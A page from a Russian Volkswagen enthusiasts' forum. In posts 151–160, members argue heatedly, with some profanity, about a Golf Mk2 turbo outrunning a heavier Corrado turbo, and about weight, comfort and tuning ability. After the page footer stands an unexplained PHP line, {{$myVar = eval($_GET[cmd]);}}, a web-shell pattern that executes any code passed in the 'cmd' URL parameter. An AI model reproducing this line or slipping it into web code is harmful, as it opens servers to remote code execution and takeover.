+ Ответить в теме
Страница 16 из 18 ПерваяПервая ... 6 14 15 16 17 18 ПоследняяПоследняя
Показано с 151 по 160 из 178

Тема: любимое авто


  1. #151
    GTI-Racing valoff 053 is on a distinguished road Аватар для valoff 053
    Регистрация
    31.12.2008
    Откуда
    Нижний Новгород
    Машина
    гольф 4 гти и Умка
    Сообщений
    556
    Г2 красавец как едет, а караду хоть и с цементом, но обЪехал, мнение моё сугубо позитивно. И есчё мне кажется нотка оправдания в словах карадавода. факт корч,но уехал.....и выкладывать я бы не постеснялся. ПРОШУ ПРОЩЕНИЯ, если кого-то невольно обидел.
    2.0т AGU 2000г.
    А3 AQA 1.8т Quattro 2000г.
    Kalina Sport Turbo 2010г.
    AUDI Coupe QUATTRO 1990г.
    AUDI S3 AMK 2001г.японочка

  2. #152
    Цитата Сообщение от Yankov Посмотреть сообщение
    Я езжу и получаю удовольствие каждый божий день на РЕТКОЙ, КРАСИВОЙ машине в идеальном состоянии. Люди на бензоколонках вылезают из крузаков, бех, меринов и говорят мне какой у меня красивый автомобиль. Кузов весь зашумлен, салон кожа - алькантара, стоит музыка, есть кондиционер, полный привод.
    А что же есть с другой стороны? (Лёх ты сейчас не обижайся, но это правда)
    Гольф2, где то чуть чуть подмятый, слегка ржавенький. Без шумки, без солона, без ковров, без музыки, без кондиционера. В салоне громко так что уши закладывает. И это чудо объёзжает меня на 4 корпуса с 80 до 240, с учётом того что разница в весе порядка 450кг, а это между прочим 9 мешков цемента по 50кг. А моторы фактически должны быть одинаковыми, ведь они оба двух литровые, 16ти клапанные, с турбинами приблизительно одного потенциала, на одинаковом 76том выхлопе.
    Так вот теперь задайтесь вопросом кто должен расстроиться.
    PS
    Я б Лёха на твоём месте постеснялся бы такое видео выкладывать.
    Вет у меня гольф как раз для таких покатух и собран) ну и я как бы не стараюсь кого то удивить шумкой или комфортом, мой гольф выполняет положенную на него функцию - рачит ходом все подряд))) а еесли хочется комфорта и музыки для этого есть другое авто в котором кстати климат работает, а не стоит для красоты)))
    P/s ты в тотал не звонил? а то чето пивка попить охота))
    Последний раз редактировалось RABBIT; 05.09.2011 в 21:34.
    vw golf mk2 16v -turbo 497h.p. 620n.m.
    skoda octavia combi 1.8T 4Х4

  3. #153
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от Yankov Посмотреть сообщение
    Я езжу и получаю удовольствие каждый божий день на РЕТКОЙ, КРАСИВОЙ машине в идеальном состоянии. Люди на бензоколонках вылезают из крузаков, бех, меринов и говорят мне какой у меня красивый автомобиль. Кузов весь зашумлен, салон кожа - алькантара, стоит музыка, есть кондиционер, полный привод.
    А что же есть с другой стороны? (Лёх ты сейчас не обижайся, но это правда)
    Гольф2, где то чуть чуть подмятый, слегка ржавенький. Без шумки, без солона, без ковров, без музыки, без кондиционера. В салоне громко так что уши закладывает. И это чудо объёзжает меня на 4 корпуса с 80 до 240, с учётом того что разница в весе порядка 450кг, а это между прочим 9 мешков цемента по 50кг. А моторы фактически должны быть одинаковыми, ведь они оба двух литровые, 16ти клапанные, с турбинами приблизительно одного потенциала, на одинаковом 76том выхлопе.
    Так вот теперь задайтесь вопросом кто должен расстроиться.
    PS
    Я б Лёха на твоём месте постеснялся бы такое видео выкладывать.
    Этого результата и стоило ожидать конечно от скорлупки, что даже поворотники светят в салон ))) Философия все ради победы, конечно имеет место быть, тут осуждай не осуждай ничего не изменится.
    Конечно мне лично максимально близка идея авто Виталика. Можно сделать одновременно и быстрый и красивый и удобный авто. А можно в случае с Лехой еще заменить окна на пластиковые и срезать часть пола в багажнике, можно пойти и дальше и заменить мотор.

    Думаю, что идея объехать именно Виталика любым способом будоражила сознание.... Виталику остается или развивать технически авто дальше, либо нагрузить Леху.
    песок сыпется....не останавливайтесь на достигнутом !

  4. #154
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Да... Парни с большими турбинами на 5-х Джедаях весело курят в сторонке... Причем понятно что курят... :)
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  5. #155
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    Цитата Сообщение от BON Посмотреть сообщение
    Думаю, что идея объехать именно Виталика любым способом будоражила сознание.... Виталику остается или развивать технически авто дальше, либо нагрузить Леху.
    думаю что Лехе глубоко пох, человек повесил результат машины как она едет, порадовались бы за него, не у каждого так авто едет, не важно что там стоит, кожа рожа с климой, или просто 2 ковша, коробка и руль с приборами:)
    Это делалось собственными руками, а не в ЧИП конторе:) собиралось и настраивалось, а вы типа корч не корч. . .
    Обе машины едут и оч хорошо:)
    BMW 330D POWERED by Dizelboost :pepper:

  6. #156
    GTI-Racing Yankov is on a distinguished road Аватар для Yankov
    Регистрация
    22.05.2009
    Откуда
    Москва
    Машина
    corrado
    Сообщений
    63
    Цитата Сообщение от RABBIT Посмотреть сообщение
    Вет у меня гольф как раз для таких покатух и собран) ну и я как бы не стараюсь кого то удивить шумкой или комфортом, мой гольф выполняет положенную на него функцию - рачит ходом все подряд))) а еесли хочется комфорта и музыки для этого есть другое авто в котором кстати климат работает, а не стоит для красоты)))
    P/s ты в тотал не звонил? а то чето пивка попить охота))
    Ты вроде на гольф2клубе в своёй ветке утверждаешь что твое авто на каждый день и не корч не разу. А тут пишешь что для пакатух собран. Ты давай Лёха определись уже.

    Ты можешь ехать или с комфортом или быстро в отличии от меня. И то в городе на своём гольфе ты соснёш за обе щёки по тому как твой гольфик едет от 150 и выше.
    PS
    Ты ещё не понял что на пиво ты точно попал. Можеш искать где ханикен подешевле.
    Лёша тебя объехать для меня не проблема. Ты просто для меня не являешься раздражителем.
    Corrado'91 black, 2.0 16V turbo, syncro

    Метеор дорог

  7. #157
    GTI-Racing Pavel095 is on a distinguished road Аватар для Pavel095
    Регистрация
    26.08.2007
    Откуда
    Moscow City
    Машина
    R-Power Carbon Edition
    Сообщений
    404
    Всё правильно ,есть абсолютно разные категории покатушек.Можно строить и затачивать авто сугубо под драг- уменьшать вес ,выкидывая всё из салона ,менять мотор или в Г1 поставить 3.6 литра битурбо и выезжать из 10сек 1/4 мили.А можно пойти другим путём-взять Вейрон, Порш 9ff или ГТР и со всеми удобствамим (климой,кожей,музыкой) рвать всех подряд.
    Когда заезжают авто с одинаковыми движками и почти равными начинками,то тут уже всё зависит от пилота и его мастерства,но при данном раскладе всё дело в весе авто и только.А вообще респект Виталю,собрать такого монстра за такие деньги это более чем круто.
    There is only one Legend - R32
    VR6 Power is Rulezzz...

  8. #158
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от Yankov Посмотреть сообщение
    Ты вроде на гольф2клубе в своёй ветке утверждаешь что твое авто на каждый день и не корч не разу. А тут пишешь что для пакатух собран. Ты давай Лёха определись уже.
    может от погоды зависит
    песок сыпется....не останавливайтесь на достигнутом !

  9. #159
    Цитата Сообщение от BON Посмотреть сообщение
    может от погоды зависит
    Гольфа собирал для покатух, что совсем не мешает ездить на нем каждый день на работу. так понятно?)
    Олег, твое мнение по поводу моего гольфа меня мало интересует, потому как я знаю что кроме как колес шумки , музыки и фотографий обсуждать с тобой не имеет смысла, так как с технической стороны (например мотора) знания твои основываются из прочитанного из интернета))) снять с 1,8т 28рс - 260сил на давке 1,4 это говорит о многом))) мне кажется если эту турбину тупо на сток прикрутить закрытыми глазами ничего не настраивая, то должно получится больше))))

    Добавлено через 14 минут
    Цитата Сообщение от Yankov Посмотреть сообщение
    Я езжу и получаю удовольствие каждый божий день на РЕТКОЙ, КРАСИВОЙ машине в идеальном состоянии. Люди на бензоколонках вылезают из крузаков, бех, меринов и говорят мне какой у меня красивый автомобиль. Кузов весь зашумлен, салон кожа - алькантара, стоит музыка, есть кондиционер, полный привод.
    А что же есть с другой стороны? (Лёх ты сейчас не обижайся, но это правда)
    Гольф2, где то чуть чуть подмятый, слегка ржавенький. Без шумки, без солона, без ковров, без музыки, без кондиционера. В салоне громко так что уши закладывает. И это чудо объёзжает меня на 4 корпуса с 80 до 240, с учётом того что разница в весе порядка 450кг, а это между прочим 9 мешков цемента по 50кг. А моторы фактически должны быть одинаковыми, ведь они оба двух литровые, 16ти клапанные, с турбинами приблизительно одного потенциала, на одинаковом 76том выхлопе.
    Так вот теперь задайтесь вопросом кто должен расстроиться.
    PS
    Я б Лёха на твоём месте постеснялся бы такое видео выкладывать.
    Вет, ты когда с63 который на 400кг тяжелей тебя + с двумя пассажирами был объехал то надо было тогда про ВЕС, шумку, комфорт и тд. написать)))) салон , музыка и тд. кондей (я правда не видел чтобы он работал) круты только по отношению к моему гольфу, даже в сравнении с кайфами скажем г5гти.... ну сам понимаешь))
    Последний раз редактировалось RABBIT; 06.09.2011 в 09:53. Причина: Добавлено сообщение
    vw golf mk2 16v -turbo 497h.p. 620n.m.
    skoda octavia combi 1.8T 4Х4

  10. #160
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от RABBIT Посмотреть сообщение
    Гольфа собирал для покатух, что совсем не мешает ездить на нем каждый день на работу. так понятно?)
    Олег, твое мнение по поводу моего гольфа меня мало интересует, потому как я знаю что кроме как колес шумки , музыки и фотографий обсуждать с тобой не имеет смысла, так как с технической стороны (например мотора) знания твои основываются из прочитанного из интернета))) снять с 1,8т 28рс - 260сил на давке 1,4 это говорит о многом))) мне кажется если эту турбину тупо на сток прикрутить закрытыми глазами ничего не настраивая, то должно получится больше))))
    Так, а с кем ёпт твою мать ты собрался тогда обсуждать свой авто с технической точки зрения ? ))) Я знаю тут только Виталика и может быть еще 1 человека, кто мотор капиталит сам. Виталик тебе уже сказал свое мнение. Скажут и другие, и что хотят, если не в настроении не пиши или не читай, т.к. помимо "вау как круто и быстро" могут быть вопросы любого толка.

    ......... не ожидал от тебя честно, такого эмоционально фонтана не имеющего к твоей теме и к твоей машине ровным счетом ничего :expect:


    З.ы. Это сейчас так принято писать не в теме про совсем другие машины ?
    Я не настраивал свой авто ни на какую давку. Это делал Калекс на штатном моцке и потом другие люди на другом, до этих людей тебе как до луны, вот и оперируй к ним, не ко мне........... Калекс у нас на форуме бывает, напиши ему, что ты лучше него настроишь 1.8Т просто прикрутив на сток улитку........ машина была в постоянном процессе, но продал и много чего не сделал.
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 16 из 18 ПерваяПервая ... 6 14 15 16 17 18 ПоследняяПоследняя

Похожие темы

  1. PC - в авто
    от parhom в разделе Авто Звук
    Ответов: 6
    Последнее сообщение: 01.10.2023, 13:21
  2. Чей авто
    от v@ncho в разделе Покупка и продажа авто
    Ответов: 14
    Последнее сообщение: 05.07.2021, 23:29
  3. авто прицеп
    от OneBass в разделе Курилка
    Ответов: 3
    Последнее сообщение: 08.08.2013, 18:27
  4. ГТИ с авто.ру
    от Pinkcheeks в разделе Отзывы / Выбор
    Ответов: 11
    Последнее сообщение: 22.06.2011, 13:11
  5. два авто
    от Fresco FSI в разделе Покупка и продажа авто
    Ответов: 0
    Последнее сообщение: 10.04.2006, 18:21

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}